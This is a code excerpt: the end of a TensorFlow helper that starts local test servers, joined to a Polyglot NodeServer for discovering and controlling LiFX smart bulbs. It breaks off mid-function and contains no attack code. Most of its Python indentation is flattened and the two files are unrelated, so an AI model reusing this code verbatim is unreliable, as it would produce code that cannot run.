assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
|
lifx-poly.py
|
#!/usr/bin/env python3
##!/home/e42/dev/py3_envs/udi-lifx-poly-venv/bin/python
"""
LiFX NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
import lifxlan
from copy import deepcopy
import json
from threading import Thread
from pathlib import Path
LOGGER = polyinterface.LOGGER
BR_INCREMENT = 2620 # this is ~4% of 65535
BR_MIN = 1310 # minimum brightness value ~2%
BR_MAX = 65535 # maximum brightness value
FADE_INTERVAL = 5000 # 5s
BRTDIM_INTERVAL = 400 # 400ms
with open('server.json') as data:
    SERVERDATA = json.load(data)
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
# Changing these will not update the ISY names and labels, you will have to edit the profile.
COLORS = {
0: ['RED', [62978, 65535, 65535, 3500]],
1: ['ORANGE', [5525, 65535, 65535, 3500]],
2: ['YELLOW', [7615, 65535, 65535, 3500]],
3: ['GREEN', [16173, 65535, 65535, 3500]],
4: ['CYAN', [29814, 65535, 65535, 3500]],
5: ['BLUE', [43634, 65535, 65535, 3500]],
6: ['PURPLE', [50486, 65535, 65535, 3500]],
7: ['PINK', [58275, 65535, 47142, 3500]],
8: ['WHITE', [58275, 0, 65535, 5500]],
9: ['COLD_WHTE', [58275, 0, 65535, 9000]],
10: ['WARM_WHITE', [58275, 0, 65535, 3200]],
11: ['GOLD', [58275, 0, 65535, 2500]]
}
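# Editorial note (added): each entry above maps an ISY index to
# [label, [hue, saturation, brightness, kelvin]] on LiFX's 16-bit HSBK scale
# (0-65535 for hue/saturation/brightness, kelvin in degrees). The HSBK list is
# what gets handed to lifxlan, e.g. (illustrative only):
#
#   device.set_color(COLORS[5][1], duration=0, rapid=True)   # BLUE preset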
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lifxLan = None
self.name = 'LiFX Controller'
self.discovery_thread = None
self.update_nodes = False
def start(self):
LOGGER.info('Starting LiFX Polyglot v2 NodeServer version {}, LiFX LAN: {}'.format(VERSION, lifxlan.__version__))
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info('Stopping LiFX Polyglot v2 NodeServer version {}'.format(VERSION))
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lifxLan = lifxlan.LifxLAN()
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _discovery_process(self):
LOGGER.info('Starting LiFX Discovery thread...')
try:
devices = self.lifxLan.get_lights()
bulbs_found = len(devices)
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(bulbs_found))
try:
old_bulbs_found = int(self.getDriver('GV0'))
except:
old_bulbs_found = bulbs_found
else:
if bulbs_found != old_bulbs_found:
LOGGER.info('NOTICE: Bulb count {} is different, was {} previously'.format(bulbs_found, old_bulbs_found))
self.setDriver('GV0', bulbs_found)
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d, label), update = self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d, label), update = self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, gid, glabel, gupdatedat), update = self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
LOGGER.info('LiFX Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
        color = None
        duration = 0
        try:
            color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
            duration = int(query.get('D.uom42'))
            LOGGER.info('Received manual change, updating all bulbs to: {} duration: {}'.format(str(color), duration))
        except TypeError:
            # Duration (D) is optional and defaults to 0, but a missing or invalid
            # color would previously raise NameError below, so bail out instead.
            if color is None:
                LOGGER.error('SET_HSBKD is missing one or more of the H, S, B, K values... ignoring')
                return
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
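# Editorial note (added, assumption about polyinterface conventions rather than
# anything defined in this file): Polyglot dispatches incoming ISY commands via
# the class-level `commands` dict, calling the mapped bound method with a dict
# such as {'cmd': 'DON', 'address': '...', 'value': '...'}; `drivers` declares
# the status values the node reports back, and `id` must match a nodedef in the
# uploaded profile.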
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev, label):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.label = label
self.connected = 1
self.uptime = 0
        self.color = []
self.lastupdate = time.time()
self.duration = 0
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
self.update()
self.long_update()
def query(self, command = None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
connected = 0
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
self.power = True if self.device.get_power() == 65535 else False
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV6', self.uptime)
if self.device.supports_infrared():
try:
ir_brightness = self.device.get_infrared()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = self.device.get_wifi_signal_mw()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.setDriver('GV0', round(wifi_signal, 1))
self.connected = connected
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns/(1000000000.0*60*60)))
def _bri_to_percent(self, bri):
return float(round(bri*100/65535, 4))
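    # Editorial worked example (added): brightness stays on LiFX's 16-bit
    # scale, so a bulb at 32768 reports roughly 50% via _bri_to_percent(), and
    # one DIM step subtracts BR_INCREMENT (2620, ~4% of 65535), giving
    # 32768 - 2620 = 30148, i.e. about 46%; callers clamp the result to
    # BR_MIN/BR_MAX.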
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
        if self.power is False:
            LOGGER.info('{} is off, ignoring DIM'.format(self.name))
            return
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(self.name, _cmd, str(ex)))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.device.supports_infrared():
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev, label):
super().__init__(controller, primary, address, name, dev, label)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
def update(self):
connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
                    except TypeError:
                        LOGGER.debug('setDriver for color caught an error. color was: {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
self.power = True if self.device.get_power() == 65535 else False
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self._set_st()
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
except:
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
        if self.power is False:
            LOGGER.info('{} is off, ignoring DIM'.format(self.name))
            return
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
                LOGGER.error('Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address, COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else: LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
